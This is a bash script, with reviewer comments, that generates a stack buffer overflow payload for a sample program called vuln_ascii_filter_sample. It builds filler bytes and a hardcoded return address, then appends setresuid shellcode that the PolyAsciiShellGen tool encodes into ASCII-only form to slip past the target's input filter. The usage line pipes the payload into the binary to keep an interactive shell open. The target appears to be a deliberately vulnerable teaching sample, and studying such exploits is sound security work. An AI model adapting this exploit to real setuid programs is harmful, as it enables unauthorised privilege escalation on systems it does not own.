################################################################################
#
# Date: May 18 2018
# Author: Vincent Dary
# File: exploit_ascii_filter_sample.sh
# Licence: GPLv3
# Description: Generate the payload to inject in the standard input of
#              vuln_ascii_filter_sample to exploit it.
#
# Usage example:
#   $ (./exploit_ascii_filter_sample.sh; cat) | ./vuln_ascii_filter_sample
#
# Runtime dependencies (all looked up relative to the current directory):
#   - ./PolyAsciiShellGen   (external encoder, not part of this file)
#   - ./setresuid_shellcode (raw byte file, read by hexdump below)
#
################################################################################
#!/bin/bash
# NOTE(review): the interpreter line above is not the first line of the file,
# so it is read as an ordinary comment rather than as a shebang.
set -e

# Payload layout parameters as given by the original author. They are tied to
# one specific build of the target binary; the values are kept verbatim.
readonly PAD_LEN="24"                  # number of filler 'A' bytes
readonly RET_ADDR="\x24\xdc\xff\xff"   # "\xNN" escapes, decoded later by `echo -e`
readonly ESP_OFFSET="-316"             # first argument for PolyAsciiShellGen
readonly NOP_FACTOR="0"                # second argument for PolyAsciiShellGen

#######################################
# Print the first input line: PAD_LEN 'A' characters, the return-address escape
# string and a literal backslash-n. perl emits the escapes untouched; only the
# final `echo -e` turns them into bytes.
# Globals:   PAD_LEN, RET_ADDR (read)
# Outputs:   the line text to stdout (no real newline, only the literal "\n")
#######################################
build_book_ref() {
  perl -e "print 'A'x'$PAD_LEN'.'$RET_ADDR'.'\n'"
}

#######################################
# Render every byte of ./setresuid_shellcode as an uppercase "\xNN" escape.
# The format string is passed to hexdump unchanged: "\\" becomes a single
# backslash, "x" is literal, 1/1 "%02X" prints one byte as two hex digits.
# Outputs:   the escape string to stdout
#######################################
dump_shellcode_escapes() {
  hexdump -v -e '"\\" "x" 1/1 "%02X"' setresuid_shellcode
}

#######################################
# Assemble the two parts and emit the final payload on stdout.
# Globals:   ESP_OFFSET, NOP_FACTOR (read)
# Outputs:   decoded payload bytes to stdout
# Returns:   non-zero (via set -e) if any helper or PolyAsciiShellGen fails
#######################################
main() {
  local book_ref shellcode_escapes encoded

  # Declaration and assignment are split so a failing command substitution is
  # still seen by `set -e`.
  book_ref=$(build_book_ref)
  shellcode_escapes=$(dump_shellcode_escapes)

  # Expansions are deliberately left unquoted to mirror the original call:
  # the escape string contains only backslashes and hex digits, so it stays a
  # single word.
  encoded=$(./PolyAsciiShellGen $ESP_OFFSET $NOP_FACTOR $shellcode_escapes)

  # `echo -e` decodes the "\xNN" and "\n" escapes accumulated above into bytes.
  echo -e "$book_ref$encoded"
}

main "$@"